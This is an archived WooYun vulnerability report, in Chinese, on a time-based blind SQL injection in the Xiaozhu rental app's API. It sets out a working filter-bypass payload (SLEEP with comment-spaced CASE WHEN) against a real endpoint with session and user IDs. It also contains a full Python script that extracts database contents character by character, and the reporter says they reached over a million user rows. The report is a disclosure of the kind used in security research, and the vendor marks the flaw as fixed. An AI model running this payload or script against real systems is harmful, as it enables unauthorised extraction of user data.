乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-04: 厂商已经修复漏洞并主动公开,细节向公众公开
请教SQLMAP中IF->CASE或绕过逗号的Tamper
目标:小猪短租官方APP检测发现以下地方存在SQL注入:(注入参数:pkeys,时间盲注)
http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=homecity%2Ccity_searchfilter_13%2Ccity_searchfilter_132&dispathChannel=xiaozhu&userId=1823761635
Payload如下:(睡4秒)
http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(4)))CTAQ)/**/AND/**/('oUPP'='oUPP&dispathChannel=xiaozhu&userId=1823761635
放SQLMap时发现没检测出来,手工看了下发现过滤了空格和逗号,于是写了个Python来跑数据:(以跑当前数据库database()为例,测试时请自行修改代理)
#!/usr/bin/env python#coding=utf8import httplib, urllib, re, timedatabase = ''temp_database = ''httpClient = Nonecount = 0i = 33while i < 128: if i == 37: i = i+1 try: headers = {"Host": "wireless.xiaozhu.com", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", "Accept-Encoding": "gzip,deflate", "Accept": "*/*", "Connection": "keep-alive"} httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30) url = "http://wireless.xiaozhu.com/app/xzfk/android/220/global/version?_=1449119094538&sessId=f83651f6f45cb6e94578c69a051f8185&pkeys=')/**/AND/**/(SELECT(0)FROM(SELECT(SLEEP(CASE/**/WHEN(database()/**/like/**/0x"+temp_database+str(hex(i))[2:]+"25)THEN/**/2/**/ELSE/**/0/**/END)))CTAQ)/**/AND/**/('oUPP'='oUPP&dispathChannel=xiaozhu&userId=1823761635" httpClient.request("GET", url=url, headers=headers) st = time.time() response = httpClient.getresponse() rp = response.read() if count == 1: if time.time()-st > 2: temp_database = temp_database + str(hex(i))[2:] database = database + chr(i) print 'count from user: ', database i = 33 count = 0 else: count = 0 elif time.time()-st > 2: count = 1 i = i-1 i=i+1 except Exception, e: print e finally: if httpClient: httpClient.close()
1、跑出当前数据库用户
2、跑出当前数据库
3、跑出当前数据库中用户表的数据条数,共130W+。仅作测试,具体就不深入了。
请多指教~
危害等级:高
漏洞Rank:20
确认时间:2015-12-03 16:18
nb!高手有兴趣聊聊吧。
2015-12-04:已修复,高手有空聊聊啊